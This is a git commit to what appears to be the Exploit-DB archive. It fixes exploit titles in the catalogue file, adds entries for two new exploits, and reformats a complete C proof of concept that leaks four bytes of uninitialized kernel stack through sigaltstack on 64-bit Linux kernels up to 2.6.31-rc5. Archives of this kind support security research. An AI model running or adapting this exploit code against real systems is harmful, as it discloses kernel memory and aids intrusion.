
Commit 207c9ba

author
Offensive Security
committed
DB: 2016-02-18
2 new exploits
1 parent cc85807 commit 207c9ba

5 files changed

Lines changed: 391 additions & 274 deletions


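--- a/files.csv
+++ b/files.csv
@@ -8825,7 +8825,7 @@ id,file,description,date,author,platform,type,port
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 (index.php more) SQL Injection Vulnerability",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection Vulnerability",2009-08-03,ZoRLu,php,webapps,0
-9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
+9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0
 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability",2009-08-04,SirGod,php,webapps,0
 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0
 9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 (/_css/js.php) Local File Inclusion Vulnerability",2009-08-04,eLwaux,php,webapps,0
@@ -8978,15 +8978,15 @@ id,file,description,date,author,platform,type,port
 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0
 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0
 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0
-9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
+9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure",2009-08-25,"Jon Oberheide",linux,local,0
 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0
 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)",2009-08-25,"Francis Provencher",windows,dos,0
 9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0
 9517,platforms/windows/dos/9517.txt,"Lotus note connector for Blackberry Manager 5.0.0.11 - ActiveX DoS Vuln",2009-08-25,"Francis Provencher",windows,dos,0
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager (video.php movie) SQL Injection Vulnerability",2009-08-25,Mr.SQL,php,webapps,0
 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - (.psh) Universal BoF Exploit (SEH)",2009-08-25,hack4love,windows,local,0
 9520,platforms/multiple/local/9520.txt,"HyperVM File Permissions Local Vulnerability",2009-08-25,"Xia Shing Zee",multiple,local,0
-9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
+9521,platforms/linux/local/9521.c,"Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit",2009-08-26,"Clément Lecigne",linux,local,0
 9522,platforms/php/webapps/9522.txt,"Moa Gallery <= 1.2.0 - Multiple Remote File Inclusion Vulnerabilities",2009-08-26,"cr4wl3r ",php,webapps,0
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 (index.php action) SQL Injection Vulnerability",2009-08-26,Mr.SQL,php,webapps,0
 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 (bsql/lfi) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
@@ -13186,7 +13186,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass Vulnerability",2010-09-29,"silent vapor",php,webapps,0
@@ -18363,8 +18363,8 @@ id,file,description,date,author,platform,type,port
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 File Retrieval Vulnerability",2001-08-31,"Hannibal Lector",cgi,remote,0
 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability",2001-12-11,Camisade,windows,local,0
 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password Vulnerability",2001-08-15,"Macintosh Security",osx,local,0
-21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privelege Elevation",2001-08-15,Indigo,windows,local,0
-21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
+21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0
+21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation Vulnerability",2001-08-15,"Digital Offense",windows,local,0
 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure Vulnerability",2001-08-16,LoWNOISE,unix,local,0
 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
@@ -29228,7 +29228,7 @@ id,file,description,date,author,platform,type,port
 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,metasploit,windows,remote,0
 32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,metasploit,php,remote,80
-32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privelege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
+32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,metasploit,hardware,remote,22
 32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass Vulnerability",2008-09-29,Crackers_Child,php,webapps,0
 32442,platforms/windows/remote/32442.c,"Nokia PC Suite <= 7.0 - Remote Buffer Overflow Vulnerability",2008-09-29,Ciph3r,windows,remote,0
 32443,platforms/php/webapps/32443.txt,"CAcert 'analyse.php' Cross-Site Scripting Vulnerability",2008-09-29,"Alexander Klink",php,webapps,0
@@ -35694,3 +35694,5 @@ id,file,description,date,author,platform,type,port
 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
+39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
+39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80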

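--- a/platforms/linux/local/9352.c
+++ b/platforms/linux/local/9352.c
@@ -1,121 +1,121 @@
-/*
-* sigaltstack-leak.c
-*
-* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
-* Jon Oberheide <jon@oberheide.org>
-* http://jon.oberheide.org
-*
-* Information:
-*
-* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
-*
-* Ulrich Drepper correctly points out that there is generally padding in
-* the structure on 64-bit hosts, and that copying the structure from
-* kernel to user space can leak information from the kernel stack in those
-* padding bytes.
-*
-* Notes:
-*
-* Only 4 bytes of uninitialized kernel stack are leaked in the padding
-* between stack_t's ss_flags and ss_size. The disclosure only affects
-* affects 64-bit hosts.
-*/
-
-#include <stdio.h>
-#include <stddef.h>
-#include <stdlib.h>
-#include <string.h>
-#include <signal.h>
-#include <unistd.h>
-#include <time.h>
-#include <sys/syscall.h>
-#include <sys/types.h>
-
-const int randcalls[] = {
-0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
-21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
-78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
-109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
-120, 121, 121, 123, 124, 125, 140, 141, 143, 146
-};
-
-void
-dump(const unsigned char *p, unsigned l)
-{
-printf("stack_t:");
-while (l > 0) {
-printf(" ");
-if (l == 12) {
-printf("*** ");
-}
-printf("%02x", *p);
-if (l == 9) {
-printf(" ***");
-}
-++p; --l;
-}
-printf("\n");
-}
-
-int
-main(void)
-{
-char *p;
-int call, ret;
-size_t size, ftest, stest;
-stack_t oss;
-
-size = sizeof(stack_t);
-
-printf("[+] Checking platform...\n");
-
-if (size == 24) {
-printf("[+] sizeof(stack_t) = %zu\n", size);
-printf("[+] Correct size, 64-bit platform.\n");
-} else {
-printf("[-] sizeof(stack_t) = %zu\n", size);
-printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
-printf("[-] No information disclosure is possible.\n");
-exit(1);
-}
-
-ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
-stest = offsetof(stack_t, ss_size);
-
-printf("[+] Checking for stack_t hole...\n");
-
-if (ftest != stest) {
-printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
-printf("[+] Hole in stack_t present!\n", ftest, stest);
-} else {
-printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
-printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
-exit(1);
-}
-
-printf("[+] Ready to call sigaltstack.\n\n");
-
-for (ret = 5; ret > 0; ret--) {
-printf("%d...\n", ret);
-sleep(1);
-}
-srand(time(NULL));
-
-while (1) {
-/* random stuff to make stack pseudo-interesting */
-call = rand() % (sizeof(randcalls) / sizeof(int));
-syscall(randcalls[call]);
-
-ret = sigaltstack(NULL, &oss);
-if (ret != 0) {
-printf("[-] Error: sigaltstack failed.\n");
-exit(1);
-}
-
-dump((unsigned char *) &oss, sizeof(oss));
-}
-
-return 0;
-}
-
-// milw0rm.com [2009-08-04]
+/*
+* sigaltstack-leak.c
+*
+* Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
+* Jon Oberheide <jon@oberheide.org>
+* http://jon.oberheide.org
+*
+* Information:
+*
+* http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
+*
+* Ulrich Drepper correctly points out that there is generally padding in
+* the structure on 64-bit hosts, and that copying the structure from
+* kernel to user space can leak information from the kernel stack in those
+* padding bytes.
+*
+* Notes:
+*
+* Only 4 bytes of uninitialized kernel stack are leaked in the padding
+* between stack_t's ss_flags and ss_size. The disclosure only affects
+* affects 64-bit hosts.
+*/
+
+#include <stdio.h>
+#include <stddef.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <unistd.h>
+#include <time.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+
+const int randcalls[] = {
+0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
+21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
+78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
+109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
+120, 121, 121, 123, 124, 125, 140, 141, 143, 146
+};
+
+void
+dump(const unsigned char *p, unsigned l)
+{
+printf("stack_t:");
+while (l > 0) {
+printf(" ");
+if (l == 12) {
+printf("*** ");
+}
+printf("%02x", *p);
+if (l == 9) {
+printf(" ***");
+}
+++p; --l;
+}
+printf("\n");
+}
+
+int
+main(void)
+{
+char *p;
+int call, ret;
+size_t size, ftest, stest;
+stack_t oss;
+
+size = sizeof(stack_t);
+
+printf("[+] Checking platform...\n");
+
+if (size == 24) {
+printf("[+] sizeof(stack_t) = %zu\n", size);
+printf("[+] Correct size, 64-bit platform.\n");
+} else {
+printf("[-] sizeof(stack_t) = %zu\n", size);
+printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
+printf("[-] No information disclosure is possible.\n");
+exit(1);
+}
+
+ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
+stest = offsetof(stack_t, ss_size);
+
+printf("[+] Checking for stack_t hole...\n");
+
+if (ftest != stest) {
+printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
+printf("[+] Hole in stack_t present!\n", ftest, stest);
+} else {
+printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
+printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
+exit(1);
+}
+
+printf("[+] Ready to call sigaltstack.\n\n");
+
+for (ret = 5; ret > 0; ret--) {
+printf("%d...\n", ret);
+sleep(1);
+}
+srand(time(NULL));
+
+while (1) {
+/* random stuff to make stack pseudo-interesting */
+call = rand() % (sizeof(randcalls) / sizeof(int));
+syscall(randcalls[call]);
+
+ret = sigaltstack(NULL, &oss);
+if (ret != 0) {
+printf("[-] Error: sigaltstack failed.\n");
+exit(1);
+}
+
+dump((unsigned char *) &oss, sizeof(oss));
+}
+
+return 0;
+}
+
+// milw0rm.com [2009-08-04]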
